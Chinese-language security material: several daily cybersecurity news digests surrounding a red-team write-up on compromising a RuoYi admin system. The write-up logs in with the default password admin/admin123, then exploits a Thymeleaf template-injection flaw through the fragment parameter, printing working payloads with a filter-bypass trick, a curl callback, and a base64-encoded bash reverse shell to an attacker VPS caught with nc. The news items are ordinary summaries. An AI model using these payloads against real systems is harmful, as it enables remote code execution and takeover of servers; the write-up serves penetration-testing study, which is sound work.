谷歌在周四推出了修复程序，以解决其Chrome浏览器中的一个高严重性安全漏洞，该漏洞已在野外被利用。该漏洞被分配了CVE标识符CVE-2024-5274，涉及V8 JavaScript和WebAssembly引擎中的类型混淆错误。该漏洞于2024年5月20日报告。类型混淆漏洞发生在程序试图以不兼容的类型访问资源时。这可能会导致严重后果，因为它允许威胁行为者执行越界内存访问、引发崩溃以及执行任意代码。这是自本月初以来谷歌修补的第四个零日漏洞， 5、Windows 24H2版本将移除Cortana和WordPad应用 https://blogs.windows.com/windows-insider/2024/05/22/releasing-windows-11-version-24h2-to-the-release-preview-channel/ 微软表示，系统升级到即将发布的Windows 11 24H2版本后，Cortana、Tips和WordPad应用程序将自动移除。这一消息在周四的博客中公布，宣布Windows 11版本24H2（Build 26100.712）现在可供Release Preview Channel的内部人员使用。公司在10月初发布的Canary Channel内部版本2596 6、新的ATM恶意软件家族出现，称能够入侵欧洲 99% 的设备 https://securityaffairs.com/163732/malware/eu-atm-malware.html 一名威胁者正在宣传一种新的 ATM 恶意软件家族，声称能够入侵欧洲 99% 的设备。该威胁者以 30,000 美元的价格出售该恶意软件，他声称“欧盟 ATM 恶意软件”是从头设计的，还可以攻击 全球约 60% 的 ATM。 7、思科 FIREPOWER 管理中心存在高危漏洞 https://securityaffairs.com/163718/security/a-high-severity-vulnerability-affects-cisco-firepower-management-center.html 思科解决了 Firepower 管理中心 (FMC) 软件基于 Web 的管理界面中的 SQL 注入漏洞。 8、网络犯罪分子利用云存储进行短信钓鱼诈骗 https://www.infosecurity-magazine.com/news/cloud-storage-exploited-sms/ 安全研究人员揭露了一系列利用 Amazon S3、Google Cloud Storage、Backblaze B2 和 IBM Cloud Object Storage 等云存储服务的犯罪活动。这些活动由未具名的威胁行为者推动，旨在将用户重定向到恶意网站，然后使用短信窃取他们的信息。通过利用云存储平台托管嵌入垃圾邮件 URL 的静态网站，攻击者可以使其消息看起来合法并避开常见的安全措施。 9、《2024年DDoS趋势报告》：DDoS攻击规模飙升233.33% https://www.nexusguard.com/file/nexusguard-ddos-trend-report-2024 Nexusguard 《2024年度DDoS趋势报告》提供了一份深刻的分析，显示攻击频率下降了54.74%，但平均攻击规模却显著上升了233.33%，这表明攻击的破坏性越来越大。尽管基于UDP、TCP、放大（Amplification）和应用层攻击的流行率有所下降，但2023年最大的攻击达到了700Gbps，比上年增长了93.42%。 10、工信部印发《工业和信息化领域数据安全风险评估实施细则（试行）》 https://www.miit.gov.cn/zwgk/zcwj/wjfb/tz/art/2024/art_414d957b786c4a549c37acd5c6e80c71.html 为引导工业和信息化领域数据处理者规范开展数据安全风险评估工作，提升数据安全管理水平，维护国家安全和发展利益，保障国家关键信息基础设施的安全稳定，推动数字经济的健康发展，工业和信息化部根据《中华人民共和国数据安全法》《中华人民共和国网络安全法》等法律，按照《工业和信息化领域数据安全管理办法(试行)》有关要求，印发了《工业和信息化领域数据安全风险评估实施细则（试行）》（以下简称《细则》），自 2024 年 6 月 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

记一次攻防演练中幸运的从若依弱口令到后台getshell的过程和分析。 0x01 漏洞发现 首先，我会先把目标的二级域名拿去使用搜索引擎来搜索收集到包含这个目标二级域名的三级域名或者四级域名的网站。 这样子可以快速的定位到你所要测试的漏洞资产。 1、推荐三个比较实用的搜索引擎： 奇安信-鹰图平台：https://hunter.qianxin.com/ 360-quake: https://quake.360.net/ fofa: https://fofa.info/ 搜索语法：domain="二级域名" 2、通过一番搜索查找翻阅，幸运女神光顾~~~。 通过搜索引擎搜索到包含目标的二级域名找到关于目标的的一个三级域名，而且还是漏洞百出的若依系统。 经典：你若不离不弃，我必生死相依 基于SpringBoot的权限管理系统，核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖 0x02 漏洞分析 Thymeleaf模板注入漏洞简介 Thymeleaf模板注入形成原因，简单来说，在Thymeleaf模板文件中使用th:fragment、 ， th:text 这类标签属性包含的内容会被渲染处理。并且在Thymeleaf渲染过程中使用 ${...} 或其他表达式中时内容会被Thymeleaf EL引擎执行。因此我们将攻击语句插入到 ${...} 表达式中，会触发Thymeleaf模板注入漏洞。如果带有 @ResponseBody 注解和 @RestController 注解则不能触发模板注入漏洞。因为@ResponseBody 和 @RestController 不会进行View解析而是直接返回。所以这同样是修复方式。 漏洞点 Server-Side Template Injection简称SSTI，也就是服务器端模板注入。 我们在审计模板注入（SSTI）漏洞时，主要查看所使用的模板引擎是否有接受用户输入的地方。主要关注xxxController层代码。在Controller层，我们关注两点：1、URL路径可控。2、return内容可控。所谓可控，也就是接受输入。 1、URL路径可控 @RequestMapping("/hello") public class HelloController {  @RequestMapping("/whoami/{name}/{sex}")  public String hello(@PathVariable("name") String name, @PathVariable("sex") String sex){    return "Hello" + name + sex; } } return内容可控 @PostMapping("/getNames") public String getCacheNames(String fragment, ModelMap mmap) {  mmap.put("cacheNames", cacheService.getCacheNames());  return prefix + "/cache::" + fragment; } return内容可控： \_\_${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("whoami").getI nputStream()).next()}\_\_::.x URL路径可控： \_\_${T(java.lang.Runtime).getRuntime().exec("touch test")}\_\_::.x 2、Ruoyi使用了thymeleaf-spring5，其中四个接口方法中设置了片段选择器： http://xxxxxx/monitor/cache/getNameshttp://xxxxxx/monitor/cache/getKeyshttp://xxxxxx/monitor/cache/getValuehttp://xxxxxx/demo/form/localrefresh/task通过这四段接口，可以指定任意fragment，以/monitor/cache/getNames接口为例，controller代码如下： @PostMapping("/getNames") public String getCacheNames(String fragment, ModelMap mmap) {    mmap.put("cacheNames", cacheService.getCacheNames());    return prefix + "/cache::" + fragment; } 简单理解：接收到 fragment 后，在return处进行了模板路径拼接。根据代码我们知道根路径为 /monitor/cache ，各个接口路径分别为 /getNames ， /getKeys ， /getValue ，请求参数均为fragment 。 这四段接口方法中，都使用了thymeleaf的语法： "/xxx::" + fragment; 我们构造fragment的值为： url编码： %24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%64%6e%73%6c%6f%67%30%40%22%29%7d                    ↓ ${T (java.lang.Runtime).getRuntime().exec("curl dnslog地址")} 当我们构造的模板片段被thymeleaf解析时，thymeleaf会将识别出fragment为SpringEL表达式。不管是?fragment=header(payload)还是?fragment=payload 但是，在执行SpringEL表达式之前，thymeleaf会去检查参数值中是否使用了"T(SomeClass)"或者"new SomeClass" 这个检查方法其实可以绕过，SpringEL表达式支持"T (SomeClass)"这样的语法，因此我们只要在T与恶意Class之间加个空格，就既可以绕过thymeleaf的检测规则，又可以执行SpringEL表达式。 因此payload中T与恶意Class之间含有空格，不论是空格或者制表符都可以绕过检测。 漏洞影响：RuoYi <= v4.7.1 0x03 开始战斗 1、回到之前的若依登录框，若依的管理系统肯定要试试看弱口令啦，用户admin，密码admin123。 非常nice，弱口令yyds，登录进入若依系统后台。 经过一番测试，后台定时任务执行不了命令，反弹shell不成功，更换了几个不同的payload都没效果，太菜了，咱也不知道为什么，其他的常见的漏洞任意文件读取、SQL注入、未授权访问啥的都没有，所以才会来测试一番Thymeleaf模板注入远程命令执行。 这四个接口路径都可以访问，我们使用第一个接口路径进行测试。 /monitor/cache/getNames /monitor/cache/getKeys /monitor/cache/getValue /demo/form/localrefresh/task 2、在若依管理系统后台直接访问/monitor/cache/getNames接口路径，使用burp suite拦截访问/monitor/cache/getNames路径的数据包。 访问/monitor/cache/getNames 使用burp suite拦截数据包 使用burp suite上自带的编码工具，使用base64编码反弹shell命令 /bin/bash -i >& /dev/tcp/vps IP/5566 0>&1 构造fragment的值，把上面使用base64的编码放入下面的payload编码成url编码 ${T (java.lang.Runtime).getRuntime().exec("bash \-c {echo,L2Jpbi9iYXNooC1poD4moC9kZXYvdGNwL3ZwcyBJUC81NTY2oDA+JjE=}|{base64,-d}|{bash,-i}")} 把前面拦截到的访问/monitor/cache/getNames路径的数据包更改请求方式为POST，更改完请求方式后在访问路径后面拼接上我们刚刚经过url编码构造fragment的值。 /monitor/cache/getNames?fragment=%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%62%61%73%68%a0%5c%2d%63%20%7b%65%63%68%6f%2c%4c%32%4a%70%62%69%39%69%59%58%4e%6f%6f%43%31%70%6f%44%34%6d%6f%43%39%6b%5a%58%59%76%64%47%4 3、在vps上面使用nc监听5566端口，接收反弹shell。 把刚刚更改了请求方式为POST，拼接上url编码构造fragment的值的数据包发送出去，可以发到重发器多发几遍。 返回包返回状态200，应该是执行成功了。 回到vps查看监听状态，nice！！！成功，拿下拿下。 漏洞挖掘的过程中要有耐心、细心，把能试的漏洞都试一试，反正试一试又不要钱，说不定就getshell了呢。。。。。。 0x04 修复建议 把若依系统更新到最新版本。

1、攻击者利用Foxit PDF 阅读器漏洞传播多种恶意软件 https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ 多个威胁行为者正在利用Foxit PDF Reader中的设计漏洞，传播各种恶意软件，如Agent Tesla、AsyncRAT、DCRat、NanoCore RAT、NjRAT、Pony、Remcos RAT和XWorm。该漏洞触发的安全警告可能会欺骗毫无防备的用户执行有害命令。值得注意的是，Adobe Acrobat Reader，更常见于沙箱或杀毒解决方案中，不易受此特定漏洞的影响，这也导致了该活动的低检测率。当用户被要求在启用某些功能之 2、GhostEngine挖矿利用漏洞驱动程序关闭EDR安全功能 https://thehackernews.com/2024/05/ghostengine-exploits-vulnerable-drivers.html 恶意加密挖矿活动代号'REF4578'，部署名为GhostEngine的恶意负载，利用漏洞驱动程序关闭安全产品并部署XMRig矿工。安天的研究人员和国外厂商在分别发布的报告中指出了这些加密挖矿攻击的非同寻常的复杂性，并分享了检测规则以帮助防御者识别和阻止这些攻击。两份报告均未将该活动归因于已知的威胁行为者，也未分享有关目标或受害者的详细信息，因此该活动的来源和范围仍不明。 3、 LockBit声称针对加拿大连锁药店London Drugs进行了攻击 https://www.bleepingcomputer.com/news/security/lockbit-says-they-stole-data-in-london-drugs-ransomware-attack/ LockBit勒索软件团伙声称他们是四月对加拿大连锁药店London Drugs进行网络攻击的幕后黑手，并威胁将在谈判失败后公开被盗数据。London Drugs在阿尔伯塔省、萨斯喀彻温省、马尼托巴省和不列颠哥伦比亚省的80多家门店中拥有超过9000名员工，提供医疗保健和药房服务。4月28日的一次网络攻击迫使London Drugs关闭了整个加拿大西部的所有零售店。该公司表 4、Atlassian Bitbucket工件文件可能泄露明文身份验证密钥 https://cloud.google.com/blog/topics/threat-intelligence/bitbucket-pipeline-leaking-secrets 研究人员发现攻击者利用在Atlassian Bitbucket工件对象中以明文形式泄露的身份验证密钥入侵AWS账户。研究人员在调查最近曝光的Amazon Web Services (AWS)机密时发现了这个问题，威胁行为者利用这些机密获得了对AWS的访问权限。尽管这个问题是在调查背景下发现的，但它说明了以前被认为是安全的数据如何以明文形式泄露到公共存储库中。Bitbucket是由Atlassian运营的一个与G 5、OmniVision在2023年勒索软件攻击后披露数据泄露事件 https://www.documentcloud.org/documents/24674250-omnivision 总部位于加利福尼亚的成像传感器制造商OmniVision警告称，去年该公司遭遇了Cactus勒索软件攻击，导致数据泄露。OmniVision是中国韦尔半导体的子公司，设计和开发用于智能手机、笔记本电脑、网络摄像头、汽车、医疗成像系统等领域的成像传感器。2023年，该公司拥有2200名员工，年收入达14亿美元。上周五，OmniVision通知了加利福尼亚州当局，称该公司在2023年9月4日至9月30日期间发生了一起安全漏洞事件，当时其系统被勒索软件加密。“2023年9月30日 6、勒索软件攻击遵循既定的模式利用VMware ESXi漏洞 https://www.sygnia.co/blog/esxi-ransomware-attacks/ 无论部署了何种文件加密恶意软件，针对VMware ESXi基础设施的勒索软件攻击都遵循既定模式。虚拟化平台是组织IT基础设施的核心组成部分，但它们往往存在固有的错误配置和漏洞，使其成为威胁行为者滥用的有利且高效的目标。研究人员通过其涉及各种勒索软件家族（如LockBit、HelloKitty、BlackMatter、RedAlert (N13V)、Scattered Spider、Akira、Cactus、BlackCat和Cheerscrypt）的事件响应工作发现，对虚拟化环境的攻击遵循 7、CISA警告Apache Flink安全漏洞正在被积极利用 https://www.cisa.gov/news-events/alerts/2024/05/23/cisa-adds-one-known-exploited-vulnerability-catalog 美国网络安全和基础设施安全局（CISA）周四将影响Apache Flink的安全漏洞添加到其已知被利用漏洞（KEV）目录中，引用了活跃利用的证据。该漏洞被追踪为CVE-2020-17519，涉及不当访问控制，可能允许攻击者通过JobManager的REST接口读取本地文件系统上的任何文件。这也意味着远程未经身份验证的攻击者可以发送精心构造的目录遍历请求，从而允许未经授权访问敏感信息。该漏洞 8、 Windows 11的Recall AI功能将记录用户在PC上的所有活动 https://blogs.microsoft.com/blog/2024/05/20/introducing-copilot-pcs/ 微软宣布在Windows 11中推出一项名为“Recall”的新AI功能，该功能记录用户在PC上的所有活动，并允许用户搜索历史活动。Recall就像你的PC的照片记忆，让用户能够通过使用母语查询的方式，有条理地访问用户在电脑上看到或做过的所有事情。通过Recall，用户可以滚动浏览你的时间轴，找到用户曾打开过的任何应用程序、网站或文档的内容。该功能利用快照根据识别到的内容建议操作，使用户能够轻松返回到Outlook中的特定电子邮件或Teams中的正确聊天记 9、Ivanti修补了Endpoint Manager中的关键远程代码执行漏洞 https://thehackernews.com/2024/05/ivanti-patches-critical-remote-code.html Ivanti在周二推出了多项修复，以解决Endpoint Manager (EPM)中可能在特定情况下被利用实现远程代码执行的多个关键安全漏洞。在这10个漏洞中，有6个漏洞（CVE-2024-29822至CVE-2024-29827，CVSS评分：9.6）涉及SQL注入漏洞，允许同一网络中的未经身份验证的攻击者执行任意代码。剩余的4个漏洞（CVE-2024-29828、CVE-2024-29829、CVE-2024-29830和CVE-2024 10、JAVS法庭录音软件在供应链攻击中被植入后门 https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored-justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/ 攻击者在广泛使用的Justice AV Solutions (JAVS)法庭视频录音软件的安装程序中植入了后门恶意软件，能够接管受感染的系统。开发该软件的公司JAVS表示，这款数字录音工具目前在全球众多法庭、律师事务所、监狱和政府机构中已有超过10000次安装。JAVS已从其官方网站上移除受感染版本，并表示包 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、llama_cpp_python Python包存在严重漏洞 https://checkmarx.com/blog/llama-drama-critical-vulnerability-cve-2024-34359-threatening-your-software-supply-chain/ 研究人员在llama_cpp_python Python包中披露了一个关键的安全漏洞，可能被威胁行为者利用来实现任意代码执行。该漏洞编号为CVE-2024-34359（CVSS评分：9.7），由软件供应链安全公司Checkmarx命名为Llama Drama。如果被利用，它可能允许攻击者在您的系统上执行任意代码，从而破坏数据和操作。llama_cpp_pytho 2、Windows 11将淘汰NTLM并新增AI驱动的应用控制和安全防护 https://www.microsoft.com/en-us/security/blog/2024/05/20/new-windows-11-features-strengthen-security-to-address-evolving-cyberthreat-landscape/ 微软在周一确认计划在今年下半年逐步淘汰Windows 11中的NT LAN Manager（NTLM），并宣布了一系列新的安全措施，以增强广泛使用的桌面操作系统的安全性。“淘汰NTLM一直是我们的安全社区的巨大需求，因为它将加强用户身份验证，计划于2024年下半年实施，”这家科技巨头表示。微软最初在2023年 3、与伊朗相关的攻击者对阿尔巴尼亚和以色列进行了网络攻击 https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/ 一个与伊朗情报和安全部（MOIS）有关的威胁行为者被认为是针对阿尔巴尼亚和以色列进行破坏性擦除攻击的幕后黑手，分别以“Homeland Justice”和“Karma”的名义进行活动。研究人员将这一活动追踪为“Void Manticore”。Void Manticore和Scarred Manticore的目标之间有明显的重叠，表明这两个组织在决定对Scarred Manticor 4、严重 SQL 注入漏洞影响 Ivanti Endpoint Manager https://securityaffairs.com/163587/security/ivanti-endpoint-manager-critical-sql-injection.html Ivanti 修复了 Endpoint Manager (EPM) 中的多个漏洞，包括远程代码执行漏洞。Ivanti 本周推出了安全补丁，以修复多个严重漏洞。 5、CISA 警告 Apache Flink 安全漏洞可能被利用 https://thehackernews.com/2024/05/cisa-warns-of-actively-exploited-apache.html 美国网络安全和基础设施安全局 (CISA) 周四将影响开源统一流处理和批处理框架 Apache Flink 的安全漏洞添加到已知利用漏洞 ( KEV ) 目录中，并指出有证据表明该漏洞被主动利用。 6、苹果 Wi-Fi 定位系统被滥用来追踪全球各地的人们 https://www.theregister.com/2024/05/23/apple_wifi_positioning_system/ 深入学者认为，苹果的Wi-Fi定位系统（WPS）可能被滥用，从而造成全球隐私噩梦。 7、逾 20 万个Confluence 数据中心实例面临远程代码执行风险 https://www.freebuf.com/news/401663.html 近日，数十万个可能存在漏洞的 Atlassian Confluence Data Center 和 Confluence Server 实例暴露在互联网山，威胁攻击者能够在这些实例上远程运行任意代码。研究人员在两款 Atlassian 产品中发现了一个安全漏洞 CVE-2024-21683（ CVSS 得分为 8.3），经过仔细分析得出，威胁攻击者可以对受影响的系统实施远程代码执行 (RCE) 攻击。 8、微软计划于 2024 年下半年逐步弃用 VBScript https://www.freebuf.com/news/401655.html 近日微软宣布将于 2024 年下半年开始弃用 VBScript，可能会先把该功能列为按需功能，后面会逐步删除。 9、四部门制定《互联网政务应用安全管理规定》 https://www.freebuf.com/news/401719.html  由中央网络安全和信息化委员会办公室、中央机构编制委员会办公室、工业和信息化部、公安部制定的《互联网政务应用安全管理规定》近日印发。规定要求，建设运行互联网政务应用应当依照有关法律、行政法规的规定以及国家标准的强制性要求，采取技术措施和其他必要措施，防范内容篡改、攻击致瘫、数据窃取等风险，保障互联网政务应用安全稳定运行和数据安全。 10、微软必应全球宕机波及 ChatGPT、Copilot、DuckDuckGo等服务 https://www.ithome.com/0/770/260.htm 微软全球必应搜索服务出现宕机事件，且持续了 1 天时间，但影响并不仅仅局限于必应搜索网站，很多调用必应搜索 API 的服务也因此受到影响。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员披露CLOUD#REVERSER恶意攻击活动 https://www.securonix.com/blog/analysis-and-detection-of-cloudreverser-an-attack-involving-threat-actors-compromising-systems-using-a-sophisticated-cloud-based-malware/ 研究人员发现了一项名为CLOUD#REVERSER的新攻击活动，该活动利用Google Drive和Dropbox等合法的云存储服务来放置恶意负载。CLOUD#REVERSER中的VBScript和PowerShell脚本本质上涉及使用Google Drive 2、攻击者利用MS Exchange Server漏洞部署恶意键盘记录器 https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/positive-technologies-detects-a-series-of-attacks-via-microsoft-exchange-server/ 一个未知的威胁行为者正在利用Microsoft Exchange Server中的已知安全漏洞，部署键盘记录器恶意软件，攻击目标是非洲和中东的实体。研究人员已经发现了超过30个受害者，涵盖政府机构、银行、IT公司和教育机构。首次入侵可追溯到2021年。该键盘记录器将账户凭证收集到一个可以通过互联 3、QNAP公司修复了NAS设备QTS和QuTS Hero中的新漏洞 https://www.qnap.com/en/security-advisory/qsa-24-23 QNAP公司已经发布了一系列中等严重性漏洞的修复补丁，这些漏洞影响了QTS和QuTS hero，其中一些可能被利用在其网络附加存储（NAS）设备上执行代码。这些问题影响QTS 5.1.x和QuTS hero h5.1.x，CVE-2024-21902：一个关键资源权限分配不当的漏洞，可能允许经过身份验证的用户通过网络读取或修改资源。CVE-2024-27127：一个双重释放漏洞，可能允许经过身份验证的用户通过网络执行任意代码。CVE-2024-27128、CVE-2024-27129和CV 4、Veeam存在严重漏洞可允许攻击者身份验证绕过 https://www.veeam.com/kb4581 研究人员发现了一个关键的安全漏洞，可能允许对手绕过身份验证保护。该漏洞编号为CVE-2024-29849（CVSS评分：9.8），可能允许未经身份验证的攻击者以任何用户身份登录Veeam Backup Enterprise Manager的Web界面。该公司还披露了影响同一产品的其他三个缺陷：CVE-2024-29850（CVSS评分：8.8），允许通过NTLM中继进行账户接管。CVE-2024-29851（CVSS评分：7.2），允许特权用户窃取Veeam Backup Enterprise Manager服务账户的NTLM哈希值， 5、严重GitHub Enterprise Server身份验证绕过漏洞已被修复 https://www.securityweek.com/critical-authentication-bypass-resolved-in-github-enterprise-server/ GitHub Enterprise Server 中的严重漏洞允许未经身份验证的攻击者获取管理权限。 6、英国研究人员发现人工智能聊天机器人极易越狱 https://www.infosecurity-magazine.com/news/ai-chatbots-vulnerable-jailbreaks/ 英国人工智能安全研究所 (AISI) 的研究人员发现，四种最常用的生成式人工智能聊天机器人很容易受到基本的越狱攻击。在英国和韩国于 5 月 21 日至 22 日联合主办的 2024 年人工智能首尔峰会之前发布的 2024 年 5 月更新中，英国 AISI 分享了对五个领先的人工智能聊天机器人进行的一系列测试的结果。 7、中国电信设备(华为和中兴)可能在德国被禁止 https://www.theregister.com/2024/05/20/huawei_germany_ban/ 出于国家安全考虑，德国正在考虑禁止在其 5G 网络中使用华为和中兴设备，尽管业界反对，而且取消中国制造的技术可能会带来高昂的成本。 8、美国证券机构新规！发现数据违规后需在 30 天内披露 https://www.secrss.com/articles/66279 SEC 通过修正案，对管理消费者个人信息处理工作的《S-P 条例》进行了修改。修正案要求，机构在发现未经授权的网络访问或客户数据使用后，必须“尽快在不超过 30 天”内通知受影响个人。 9、工信部:调用安卓FileProvider组件的移动应用存在高危漏洞 https://www.secrss.com/articles/66240 工业和信息化部网络安全威胁和漏洞信息共享平台监测发现，多个调用安卓操作系统 FileProvider 组件的移动互联网应用程序（以下简称APP）存在路径遍历高危漏洞，可被恶意利用实施网络攻击。 10、特斯拉汽车的开源数据记录器 TeslaLogger 中发现漏洞 https://cybersecuritynews.com/30-tesla-cars-hacked/ 一名安全研究人员发现 TeslaLogger（用于从 Tesla 车辆收集数据的第三方软件）中存在一个漏洞，该漏洞利用不安全的默认设置，可被利用来获得对 TeslaLogger 实例的未经授权的访问。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。